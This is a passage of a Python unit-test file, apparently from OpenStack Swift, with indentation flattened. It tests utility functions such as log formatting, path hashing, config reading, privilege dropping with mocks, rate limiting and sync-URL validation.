# test eventlet.Timeout
connection_timeout = ConnectionTimeout(42, 'my error message')
log_exception(connection_timeout)
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('ConnectionTimeout' in log_msg)
self.assertTrue('(42s)' in log_msg)
self.assertTrue('my error message' not in log_msg)
connection_timeout.cancel()
message_timeout = MessageTimeout(42, 'my error message')
log_exception(message_timeout)
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('MessageTimeout' in log_msg)
self.assertTrue('(42s)' in log_msg)
self.assertTrue('my error message' in log_msg)
message_timeout.cancel()
# test unhandled
log_exception(Exception('my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' in log_msg)
self.assertTrue('my error message' in log_msg)
finally:
logger.logger.removeHandler(handler)
@reset_logger_state
def test_swift_log_formatter_max_line_length(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
formatter = utils.SwiftLogFormatter(max_line_length=10)
handler.setFormatter(formatter)
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
try:
logger.info('12345')
self.assertEqual(strip_value(sio), '12345\n')
logger.info('1234567890')
self.assertEqual(strip_value(sio), '1234567890\n')
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12 ... de\n')
formatter.max_line_length = 11
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123 ... cde\n')
formatter.max_line_length = 0
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234567890abcde\n')
formatter.max_line_length = 1
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1\n')
formatter.max_line_length = 2
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12\n')
formatter.max_line_length = 3
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123\n')
formatter.max_line_length = 4
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234\n')
formatter.max_line_length = 5
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12345\n')
formatter.max_line_length = 6
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123456\n')
formatter.max_line_length = 7
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1 ... e\n')
formatter.max_line_length = -10
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234567890abcde\n')
finally:
logger.logger.removeHandler(handler)
@reset_logger_state
def test_swift_log_formatter(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
handler.setFormatter(utils.SwiftLogFormatter())
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
try:
self.assertFalse(logger.txn_id)
logger.error('my error message')
log_msg = strip_value(sio)
self.assertTrue('my error message' in log_msg)
self.assertTrue('txn' not in log_msg)
logger.txn_id = '12345'
logger.error('test')
log_msg = strip_value(sio)
self.assertTrue('txn' in log_msg)
self.assertTrue('12345' in log_msg)
# test no txn on info message
self.assertEqual(logger.txn_id, '12345')
logger.info('test')
log_msg = strip_value(sio)
self.assertTrue('txn' not in log_msg)
self.assertTrue('12345' not in log_msg)
# test txn already in message
self.assertEqual(logger.txn_id, '12345')
logger.warn('test 12345 test')
self.assertEqual(strip_value(sio), 'test 12345 test\n')
# Test multi line collapsing
logger.error('my\nerror\nmessage')
log_msg = strip_value(sio)
self.assertTrue('my#012error#012message' in log_msg)
# test client_ip
self.assertFalse(logger.client_ip)
logger.error('my error message')
log_msg = strip_value(sio)
self.assertTrue('my error message' in log_msg)
self.assertTrue('client_ip' not in log_msg)
logger.client_ip = '1.2.3.4'
logger.error('test')
log_msg = strip_value(sio)
self.assertTrue('client_ip' in log_msg)
self.assertTrue('1.2.3.4' in log_msg)
# test no client_ip on info message
self.assertEqual(logger.client_ip, '1.2.3.4')
logger.info('test')
log_msg = strip_value(sio)
self.assertTrue('client_ip' not in log_msg)
self.assertTrue('1.2.3.4' not in log_msg)
# test client_ip (and txn) already in message
self.assertEqual(logger.client_ip, '1.2.3.4')
logger.warn('test 1.2.3.4 test 12345')
self.assertEqual(strip_value(sio), 'test 1.2.3.4 test 12345\n')
finally:
logger.logger.removeHandler(handler)
def test_storage_directory(self):
self.assertEqual(utils.storage_directory('objects', '1', 'ABCDEF'),
'objects/1/DEF/ABCDEF')
def test_expand_ipv6(self):
expanded_ipv6 = "fe80::204:61ff:fe9d:f156"
upper_ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(upper_ipv6))
omit_ipv6 = "fe80:0000:0000::0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(omit_ipv6))
less_num_ipv6 = "fe80:0:00:000:0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(less_num_ipv6))
def test_whataremyips(self):
myips = utils.whataremyips()
self.assertTrue(len(myips) > 1)
self.assertTrue('127.0.0.1' in myips)
def test_whataremyips_bind_to_all(self):
for any_addr in ('0.0.0.0', '0000:0000:0000:0000:0000:0000:0000:0000',
'::0', '::0000', '::',
# Wacky parse-error input produces all IPs
'I am a bear'):
myips = utils.whataremyips(any_addr)
self.assertTrue(len(myips) > 1)
self.assertTrue('127.0.0.1' in myips)
def test_whataremyips_bind_ip_specific(self):
self.assertEqual(['1.2.3.4'], utils.whataremyips('1.2.3.4'))
def test_whataremyips_error(self):
def my_interfaces():
return ['eth0']
def my_ifaddress_error(interface):
raise ValueError
with patch('netifaces.interfaces', my_interfaces), \
patch('netifaces.ifaddresses', my_ifaddress_error):
self.assertEqual(utils.whataremyips(), [])
def test_whataremyips_ipv6(self):
test_ipv6_address = '2001:6b0:dead:beef:2::32'
test_interface = 'eth0'
def my_ipv6_interfaces():
return ['eth0']
def my_ipv6_ifaddresses(interface):
return {AF_INET6:
[{'netmask': 'ffff:ffff:ffff:ffff::',
'addr': '%s%%%s' % (test_ipv6_address, test_interface)}]}
with patch('netifaces.interfaces', my_ipv6_interfaces), \
patch('netifaces.ifaddresses', my_ipv6_ifaddresses):
myips = utils.whataremyips()
self.assertEqual(len(myips), 1)
self.assertEqual(myips[0], test_ipv6_address)
def test_hash_path(self):
        # Yes, these tests are deliberately very fragile. We want to make sure
        # that if someone changes the results hash_path produces, they know it.
with mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''):
self.assertEqual(utils.hash_path('a'),
'1c84525acb02107ea475dcd3d09c2c58')
self.assertEqual(utils.hash_path('a', 'c'),
'33379ecb053aa5c9e356c68997cbb59e')
self.assertEqual(utils.hash_path('a', 'c', 'o'),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=True),
'\x06\xfb\xf0\xb5\x14\xe5\x19\x9d\xfcN'
'\x00\xf4.\xb5\xea\x83')
self.assertRaises(ValueError, utils.hash_path, 'a', object='o')
utils.HASH_PATH_PREFIX = 'abcdef'
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False),
'363f9b535bfb7d17a43a46a358afca0e')
def test_validate_hash_conf(self):
# no section causes InvalidHashPathConfigError
self._test_validate_hash_conf([], [], True)
# 'swift-hash' section is there but no options causes
# InvalidHashPathConfigError
self._test_validate_hash_conf(['swift-hash'], [], True)
# if we have the section and either of prefix or suffix,
# InvalidHashPathConfigError doesn't occur
self._test_validate_hash_conf(
['swift-hash'], ['swift_hash_path_prefix'], False)
self._test_validate_hash_conf(
['swift-hash'], ['swift_hash_path_suffix'], False)
# definitely, we have the section and both of them,
# InvalidHashPathConfigError doesn't occur
self._test_validate_hash_conf(
['swift-hash'],
['swift_hash_path_suffix', 'swift_hash_path_prefix'], False)
# But invalid section name should make an error even if valid
# options are there
self._test_validate_hash_conf(
['swift-hash-xxx'],
['swift_hash_path_suffix', 'swift_hash_path_prefix'], True)
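    # Helper for test_validate_hash_conf: substitute a FakeConfigParser that
    # only "knows" the given sections/options, then check whether
    # validate_hash_conf() raises InvalidHashPathConfigError.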
def _test_validate_hash_conf(self, sections, options, should_raise_error):
class FakeConfigParser(object):
def read(self, conf_path):
return True
def get(self, section, option):
if section not in sections:
raise NoSectionError('section error')
elif option not in options:
raise NoOptionError('option error', 'this option')
else:
return 'some_option_value'
with mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
mock.patch('swift.common.utils.HASH_PATH_SUFFIX', ''), \
mock.patch('swift.common.utils.ConfigParser',
FakeConfigParser):
try:
utils.validate_hash_conf()
except utils.InvalidHashPathConfigError:
if not should_raise_error:
self.fail('validate_hash_conf should not raise an error')
else:
if should_raise_error:
self.fail('validate_hash_conf should raise an error')
def test_load_libc_function(self):
self.assertTrue(callable(
utils.load_libc_function('printf')))
self.assertTrue(callable(
utils.load_libc_function('some_not_real_function')))
self.assertRaises(AttributeError,
utils.load_libc_function, 'some_not_real_function',
fail_if_missing=True)
def test_readconf(self):
conf = '''[section1]
foo = bar
[section2]
log_name = yarr'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': 'yarr'}}
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1')
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar'}
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile,
'section2').get('log_name')
expected = 'yarr'
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
log_name='foo').get('log_name')
expected = 'foo'
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
defaults={'bar': 'baz'})
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar', 'bar': 'baz'}
self.assertEqual(result, expected)
self.assertRaises(SystemExit, utils.readconf, temppath, 'section3')
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_raw(self):
conf = '''[section1]
foo = bar
[section2]
log_name = %(yarr)s'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile, raw=True)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': '%(yarr)s'}}
self.assertEqual(result, expected)
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_dir(self):
config_dir = {
'server.conf.d/01.conf': """
[DEFAULT]
port = 8080
foo = bar
[section1]
name=section1
""",
'server.conf.d/section2.conf': """
[DEFAULT]
port = 8081
bar = baz
[section2]
name=section2
""",
'other-server.conf.d/01.conf': """
[DEFAULT]
port = 8082
[section3]
name=section3
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section1',
},
'section2': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section2',
},
}
self.assertEqual(conf, expected)
def test_readconf_dir_ignores_hidden_and_nondotconf_files(self):
config_dir = {
'server.conf.d/01.conf': """
[section1]
port = 8080
""",
'server.conf.d/.01.conf.swp': """
[section]
port = 8081
""",
'server.conf.d/01.conf-bak': """
[section]
port = 8082
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8080',
},
}
self.assertEqual(conf, expected)
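    # drop_privileges() is exercised against a MockOs: setgroups/setgid/setuid/
    # setsid/chdir/umask must all be called, HOME must point at the user's
    # pw_dir, and an OSError from setsid() must be tolerated.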
def test_drop_privileges(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'setsid',
'chdir', 'umask')
utils.os = MockOs(called_funcs=required_func_calls)
# exercise the code
utils.drop_privileges(user)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
import pwd
self.assertEqual(pwd.getpwnam(user)[5], utils.os.environ['HOME'])
groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
groups.append(pwd.getpwnam(user).pw_gid)
self.assertEqual(set(groups), set(os.getgroups()))
# reset; test same args, OSError trying to get session leader
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=('setsid',))
for func in required_func_calls:
self.assertFalse(utils.os.called_funcs.get(func, False))
utils.drop_privileges(user)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
def test_drop_privileges_no_call_setsid(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'chdir',
'umask')
bad_func_calls = ('setsid',)
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=bad_func_calls)
# exercise the code
utils.drop_privileges(user, call_setsid=False)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
for func in bad_func_calls:
self.assertTrue(func not in utils.os.called_funcs)
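    # capture_stdio() should install an excepthook, close the standard fds
    # (skipping them when dup2 fails), and replace sys.stdout/sys.stderr with
    # LoggerFileObjects unless stdout/stderr capture is turned off.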
@reset_logger_state
def test_capture_stdio(self):
# stubs
logger = utils.get_logger(None, 'dummy')
# mock utils system modules
_orig_sys = utils.sys
_orig_os = utils.os
try:
utils.sys = MockSys()
utils.os = MockOs()
# basic test
utils.capture_stdio(logger)
self.assertTrue(utils.sys.excepthook is not None)
self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds)
self.assertTrue(
isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assertTrue(
isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test same args, but exc when trying to close stdio
utils.os = MockOs(raise_funcs=('dup2',))
utils.sys = MockSys()
# test unable to close stdio
utils.capture_stdio(logger)
self.assertTrue(utils.sys.excepthook is not None)
self.assertEqual(utils.os.closed_fds, [])
self.assertTrue(
isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assertTrue(
isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test some other args
utils.os = MockOs()
utils.sys = MockSys()
logger = utils.get_logger(None, log_to_console=True)
# test console log
utils.capture_stdio(logger, capture_stdout=False,
capture_stderr=False)
self.assertTrue(utils.sys.excepthook is not None)
# when logging to console, stderr remains open
self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds[:2])
reset_loggers()
# stdio not captured
self.assertFalse(isinstance(utils.sys.stdout,
utils.LoggerFileObject))
self.assertFalse(isinstance(utils.sys.stderr,
utils.LoggerFileObject))
finally:
utils.sys = _orig_sys
utils.os = _orig_os
@reset_logger_state
def test_get_logger_console(self):
logger = utils.get_logger(None)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertFalse(console_handlers)
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertTrue(console_handlers)
# make sure you can't have two console handlers
self.assertEqual(len(console_handlers), 1)
old_handler = console_handlers[0]
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertEqual(len(console_handlers), 1)
new_handler = console_handlers[0]
self.assertNotEqual(new_handler, old_handler)
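    # Run func under a fake clock: time.time(), time.sleep() and
    # eventlet.sleep() are patched so the ratelimit tests below finish
    # instantly while the simulated elapsed time is still checked to be
    # within 100ms of target_runtime_ms.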
def verify_under_pseudo_time(
self, func, target_runtime_ms=1, *args, **kwargs):
curr_time = [42.0]
def my_time():
curr_time[0] += 0.001
return curr_time[0]
def my_sleep(duration):
curr_time[0] += 0.001
curr_time[0] += duration
with patch('time.time', my_time), \
patch('time.sleep', my_sleep), \
patch('eventlet.sleep', my_sleep):
start = time.time()
func(*args, **kwargs)
            # make sure it's accurate to a tenth of a second: convert the time
            # difference to milliseconds; 100 milliseconds is 1/10 of a second
diff_from_target_ms = abs(
target_runtime_ms - ((time.time() - start) * 1000))
self.assertTrue(diff_from_target_ms < 100,
"Expected %d < 100" % diff_from_target_ms)
def test_ratelimit_sleep(self):
def testfunc():
running_time = 0
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, -5)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=1)
def testfunc():
running_time = 0
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, 0)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=1)
def testfunc():
running_time = 0
for i in range(50):
running_time = utils.ratelimit_sleep(running_time, 200)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=250)
def test_ratelimit_sleep_with_incr(self):
def testfunc():
running_time = 0
vals = [5, 17, 0, 3, 11, 30,
40, 4, 13, 2, -1] * 2 # adds up to 248
total = 0
for i in vals:
running_time = utils.ratelimit_sleep(running_time,
500, incr_by=i)
total += i
self.assertEqual(248, total)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=500)
def test_ratelimit_sleep_with_sleep(self):
def testfunc():
running_time = 0
sleeps = [0] * 7 + [.2] * 3 + [0] * 30
for i in sleeps:
running_time = utils.ratelimit_sleep(running_time, 40,
rate_buffer=1)
time.sleep(i)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=900)
def test_urlparse(self):
parsed = utils.urlparse('http://127.0.0.1/')
self.assertEqual(parsed.scheme, 'http')
self.assertEqual(parsed.hostname, '127.0.0.1')
self.assertEqual(parsed.path, '/')
parsed = utils.urlparse('http://127.0.0.1:8080/')
self.assertEqual(parsed.port, 8080)
parsed = utils.urlparse('https://127.0.0.1/')
self.assertEqual(parsed.scheme, 'https')
parsed = utils.urlparse('http://[::1]/')
self.assertEqual(parsed.hostname, '::1')
parsed = utils.urlparse('http://[::1]:8080/')
self.assertEqual(parsed.hostname, '::1')
self.assertEqual(parsed.port, 8080)
parsed = utils.urlparse('www.example.com')
self.assertEqual(parsed.hostname, '')
def test_search_tree(self):
# file match & ext miss
with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t:
asdf = utils.search_tree(t, 'a*', '.conf')
self.assertEqual(len(asdf), 1)
self.assertEqual(asdf[0],
os.path.join(t, 'asdf.conf'))
# multi-file match & glob miss & sort
with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t:
app_bins = utils.search_tree(t, 'app*', 'bin')
self.assertEqual(len(app_bins), 2)
self.assertEqual(app_bins[0],
os.path.join(t, 'apple.bin'))
self.assertEqual(app_bins[1],
os.path.join(t, 'application.bin'))
# test file in folder & ext miss & glob miss
files = (
'sub/file1.ini',
'sub/file2.conf',
'sub.bin',
'bus.ini',
'bus/file3.ini',
)
with temptree(files) as t:
sub_ini = utils.search_tree(t, 'sub*', '.ini')
self.assertEqual(len(sub_ini), 1)
self.assertEqual(sub_ini[0],
os.path.join(t, 'sub/file1.ini'))
# test multi-file in folder & sub-folder & ext miss & glob miss
files = (
'folder_file.txt',
'folder/1.txt',
'folder/sub/2.txt',
'folder2/3.txt',
'Folder3/4.txt'
'folder.rc',
)
with temptree(files) as t:
folder_texts = utils.search_tree(t, 'folder*', '.txt')
self.assertEqual(len(folder_texts), 4)
f1 = os.path.join(t, 'folder_file.txt')
f2 = os.path.join(t, 'folder/1.txt')
f3 = os.path.join(t, 'folder/sub/2.txt')
f4 = os.path.join(t, 'folder2/3.txt')
for f in [f1, f2, f3, f4]:
self.assertTrue(f in folder_texts)
def test_search_tree_with_directory_ext_match(self):
files = (
'object-server/object-server.conf-base',
'object-server/1.conf.d/base.conf',
'object-server/1.conf.d/1.conf',
'object-server/2.conf.d/base.conf',
'object-server/2.conf.d/2.conf',
'object-server/3.conf.d/base.conf',
'object-server/3.conf.d/3.conf',
'object-server/4.conf.d/base.conf',
'object-server/4.conf.d/4.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'object-server', '.conf',
dir_ext='conf.d')
self.assertEqual(len(conf_dirs), 4)
for i in range(4):
conf_dir = os.path.join(t, 'object-server/%d.conf.d' % (i + 1))
self.assertTrue(conf_dir in conf_dirs)
def test_search_tree_conf_dir_with_named_conf_match(self):
files = (
'proxy-server/proxy-server.conf.d/base.conf',
'proxy-server/proxy-server.conf.d/pipeline.conf',
'proxy-server/proxy-noauth.conf.d/base.conf',
'proxy-server/proxy-noauth.conf.d/pipeline.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'proxy-server', 'noauth.conf',
dir_ext='noauth.conf.d')
self.assertEqual(len(conf_dirs), 1)
conf_dir = conf_dirs[0]
expected = os.path.join(t, 'proxy-server/proxy-noauth.conf.d')
self.assertEqual(conf_dir, expected)
def test_search_tree_conf_dir_pid_with_named_conf_match(self):
files = (
'proxy-server/proxy-server.pid.d',
'proxy-server/proxy-noauth.pid.d',
)
with temptree(files) as t:
pid_files = utils.search_tree(t, 'proxy-server',
exts=['noauth.pid', 'noauth.pid.d'])
self.assertEqual(len(pid_files), 1)
pid_file = pid_files[0]
expected = os.path.join(t, 'proxy-server/proxy-noauth.pid.d')
self.assertEqual(pid_file, expected)
def test_write_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'test')
utils.write_file(file_name, 'test')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEqual(contents, 'test')
# and also subdirs
file_name = os.path.join(t, 'subdir/test2')
utils.write_file(file_name, 'test2')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEqual(contents, 'test2')
            # but can't write a file where a path component is an existing file
file_name = os.path.join(t, 'subdir/test2/test3')
self.assertRaises(IOError, utils.write_file, file_name,
'test3')
def test_remove_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'blah.pid')
# assert no raise
self.assertEqual(os.path.exists(file_name), False)
self.assertEqual(utils.remove_file(file_name), None)
with open(file_name, 'w') as f:
f.write('1')
self.assertTrue(os.path.exists(file_name))
self.assertEqual(utils.remove_file(file_name), None)
self.assertFalse(os.path.exists(file_name))
def test_human_readable(self):
self.assertEqual(utils.human_readable(0), '0')
self.assertEqual(utils.human_readable(1), '1')
self.assertEqual(utils.human_readable(10), '10')
self.assertEqual(utils.human_readable(100), '100')
self.assertEqual(utils.human_readable(999), '999')
self.assertEqual(utils.human_readable(1024), '1Ki')
self.assertEqual(utils.human_readable(1535), '1Ki')
self.assertEqual(utils.human_readable(1536), '2Ki')
self.assertEqual(utils.human_readable(1047552), '1023Ki')
self.assertEqual(utils.human_readable(1048063), '1023Ki')
self.assertEqual(utils.human_readable(1048064), '1Mi')
self.assertEqual(utils.human_readable(1048576), '1Mi')
self.assertEqual(utils.human_readable(1073741824), '1Gi')
self.assertEqual(utils.human_readable(1099511627776), '1Ti')
self.assertEqual(utils.human_readable(1125899906842624), '1Pi')
self.assertEqual(utils.human_readable(1152921504606846976), '1Ei')
self.assertEqual(utils.human_readable(1180591620717411303424), '1Zi')
self.assertEqual(utils.human_readable(1208925819614629174706176),
'1Yi')
self.assertEqual(utils.human_readable(1237940039285380274899124224),
'1024Yi')
def test_validate_sync_to(self):
fname = 'container-sync-realms.conf'
fcontents = '''
[US]
key = 9ff3b71c849749dbaec4ccdd3cbab62b
cluster_dfw1 = http://dfw1.host/v1/
'''
with temptree([fname], [fcontents]) as tempdir:
logger = FakeLogger()
fpath = os.path.join(tempdir, fname)
csr = ContainerSyncRealms(fpath, logger)
for realms_conf in (None, csr):
for goodurl, result in (
('http://1.1.1.1/v1/a/c',
(None, 'http://1.1.1.1/v1/a/c', None, None)),
('http://1.1.1.1:8080/a/c',
(None, 'http://1.1.1.1:8080/a/c', None, None)),
('http://2.2.2.2/a/c',
(None, 'http://2.2.2.2/a/c', None, None)),
('https://1.1.1.1/v1/a/c',
(None, 'https://1.1.1.1/v1/a/c', None, None)),
('//US/DFW1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//us/DFW1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//us/dfw1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//',
(None, None, None, None)),
('',
(None, None, None, None))):
if goodurl.startswith('//') and not realms_conf:
self.assertEqual(
utils.validate_sync_to(
goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
(None, None, None, None))
else:
self.assertEqual(
utils.validate_sync_to(
goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
result)
for badurl, result in (
('http://1.1.1.1',
('Path required in X-Container-Sync-To', None, None,
None)),
('httpq://1.1.1.1/v1/a/c',
('Invalid scheme \'httpq\' in X-Container-Sync-To, '
'must be "//", "http", or "https".', None, None,
None)),
('http://1.1.1.1/v1/a/c?query',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query=param',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query=param#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.2/v1/a/c',
("Invalid host '1.1.1.2' in X-Container-Sync-To",
None, None, None)),
('//us/invalid/a/c',
("No cluster endpoint for 'us' 'invalid'", None,
None, None)),
('//invalid/dfw1/a/c',
("No realm key for 'invalid'", None, None, None)),
('//us/invalid1/a/',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/a/'", None, None, None)),
('//us/invalid1/a',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/a'", None, None, None)),
('//us/invalid1/',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/'", None, None, None)),
('//us/invalid1',
("Invalid X-Container-Sync-To format "
"'//us/invalid1'", None, None, None)),
('//us/',
("Invalid X-Container-Sync-To format "
"'//us/'", None, None, None)),
('//us',
("Invalid X-Container-Sync-To format "
"'//us'", None, None, None))):
if badurl.startswith('//') and not realms_conf:
self.assertEqual(
utils.validate_sync_to(
badurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
(None, None, None, None))
else:
self.assertEqual(
utils.validate_sync_to(
badurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
result)
def test_TRUE_VALUES(self):
for v in utils.TRUE_VALUES:
self.assertEqual(v, v.lower())
def test_config_true_value(self):
orig_trues = utils.TRUE_VALUES
try:
utils.TRUE_VALUES = 'hello world'.split()
for val in 'hello world HELLO WORLD'.split():
self.assertTrue(utils.config_true_value(val) is True)
self.assertTrue(utils.config_true_value(True) is True)
self.assertTrue(utils.config_true_value('foo') is False)
self.assertTrue(utils.config_true_value(False) is False)
finally:
utils.TRUE_VALUES = orig_trues
def test_config_auto_int_value(self):
expectations = {
# (value, default) : expected,
('1', 0): 1,
(1, 0): 1,
('asdf', 0): ValueError,
('auto', 1): 1,
('AutO', 1): 1,
('Aut0', 1): ValueError,
(None, 1): 1,
}
for (value, default), expected in expectations.items():
try:
rv = utils.config_auto_int_value(value, default)
except Exception as e:
if e.__class__ is not expected:
raise
else:
self.assertEqual(expected, rv)
def test_streq_const_time(self):
self.assertTrue(utils.streq_const_time('abc123', 'abc123'))
self.assertFalse(utils.streq_const_time('a', 'aaaaa'))
self.assertFalse(utils.streq_const_time('ABC123', 'abc123'))
def test_replication_quorum_size(self):
expected_sizes = {1: 1,
2: 2,
3: 2,
4: 3,
5: 3}
got_sizes = dict([(n, utils.quorum_size(n))
for n in expected_sizes])
self.assertEqual(expected_sizes, got_sizes)
def test_rsync_ip_ipv4_localhost(self):
self.assertEqual(utils.rsync_ip('127.0.0.1'), '127.0.0.1')
def test_rsync_ip_ipv6_random_ip(self):
self.assertEqual(
utils.rsync_ip('fe80:0000:0000:0000:0202:b3ff:fe1e:8329'),
'[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]')
def test_rsync_ip_ipv6_ipv4_compatible(self):
self.assertEqual(
utils.rsync_ip('::ffff:192.0.2.128'), '[::ffff:192.0.2.128]')
def test_rsync_module_interpolation(self):
fake_device = {'ip': '127.0.0.1', 'port': 11,
'replication_ip': '127.0.0.2', 'replication_port': 12,
'region': '1', 'zone': '2', 'device': 'sda1',
'meta': 'just_a_string'}
self.assertEqual(
utils.rsync_module_interpolation('{ip}', fake_device),
'127.0.0.1')
self.assertEqual(
utils.rsync_module_interpolation('{port}', fake_device),
'11')
self.assertEqual(
utils.rsync_module_interpolation('{replication_ip}', fake_device),
'127.0.0.2')
self.assertEqual(
utils.rsync_module_interpolation('{replication_port}',
fake_device),
'12')
self.assertEqual(
utils.rsync_module_interpolation('{region}', fake_device),
'1')
self.assertEqual(
utils.rsync_module_interpolation('{zone}', fake_device),
'2')
